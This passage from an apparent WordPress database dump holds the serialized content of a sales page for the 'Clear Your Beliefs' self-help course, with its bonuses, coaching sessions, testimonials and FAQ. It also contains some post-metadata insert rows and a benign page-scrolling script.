want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n	<strong>=> <em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.\n	<strong>=> <em>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.\n	<strong>=> <em>Your Childhood Bonding Pattern Assessment:</em></strong> The LoveStyle Profile Quiz\n	<strong>=> <em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)\n	<strong>=> <em>Clear Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> Multimedia eBook by Lion Goodman (PDF)\n	<strong>=> <em>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.\n	<strong>=> <em>Professional Coaching Sessions:</strong> </em> Optional.\n\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(18238, 1163, '_edit_lock', '1524013315:2'),
(18239, 3946, '_edit_lock', '1524011597:2'),
(18233, 2061, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(18232, 2061, '_pys_head_footer', 'a:7:{s:14:"disable_global";b:0;s:8:"head_any";s:0:"";s:12:"head_desktop";s:0:"";s:11:"head_mobile";s:0:"";s:10:"footer_any";s:0:"";s:14:"footer_desktop";s:0:"";s:13:"footer_mobile";s:0:"";}'),
(18231, 2061, '_wpb_vc_js_status', 'false'),
(16272, 3929, '_wp_desired_post_slug', 'hello-world-11'),
(16271, 3929, '_wp_trash_meta_time', '1523027128'),
(16270, 3929, '_wp_trash_meta_status', 'publish'),
(16267, 3928, '_wp_desired_post_slug', 'hello-world-11'),
(16266, 3928, '_wp_trash_meta_time', '1523025875'),
(18304, 3987, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(18305, 1141, '_vc_post_settings', 'a:1:{s:10:"vc_grid_id";a:0:{}}'),
(18306, 1141, '_pys_head_footer', 'a:7:{s:14:"disable_global";b:0;s:8:"head_any";s:0:"";s:12:"head_desktop";s:0:"";s:11:"head_mobile";s:0:"";s:10:"footer_any";s:0:"";s:14:"footer_desktop";s:0:"";s:13:"footer_mobile";s:0:"";}'),
(18299, 3984, '_wp_trash_meta_status', 'publish'),
(18300, 3984, '_wp_trash_meta_time', '1525000072'),
(18301, 3984, '_wp_desired_post_slug', 'hello-world-11'),
(16265, 3928, '_wp_trash_meta_status', 'publish'),
(7311, 3605, '_oembed_time_247635f72c73bff43734404a5f60a31a', '1516271802');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
(1951, 2228, 'panels_data', 'a:3:{s:7:"widgets";a:1:{i:0;a:4:{s:5:"title";s:0:"";s:4:"text";s:72841:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/129244809?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n<div class="quot" style="text-align: center; margin: 0px auto ! important;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\nLearn to change your beliefs, and your limitations will disappear.\nYour possibilities will then become unlimited.</strong></span>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\n<div class="clear"></div>\n\n&nbsp;\n\n<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>\n\n&nbsp;\n\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You''re seeking a better life, and you''ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You''ve had some breakthrough experiences and epiphanies. You''ve made progress toward your goals.\n\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\n\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/ebook/" target="_blank">Register for FREE Ebook</a></center></h1>\n\n<h1>What If You Could Permanently Delete Old Habits And Patterns – So They <em>Didn''t</em> Come Back?</h1>\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their "fixes" tend to wear off over time. After taking their program, you''re revved up, transformed, and ready to go.\n\n<strong>Two weeks later,</strong> you''re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\n&nbsp;\n<h1><center><a class="big button blue" href="http://clearyourbeliefs.com/program/#package" >Okay, I''m convinced!<br />Take me to the program description,<br />tell me about all the cool bonuses I''ll get,<br />and how much it costs...</a><br /></center></h1>\n&nbsp;\n<h1>Why Does This Happen?</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\n\nNeuroscientists call the brain''s ability to change over time "neuroplasticity."\n\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\n\n&nbsp;\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\n\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\n\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" 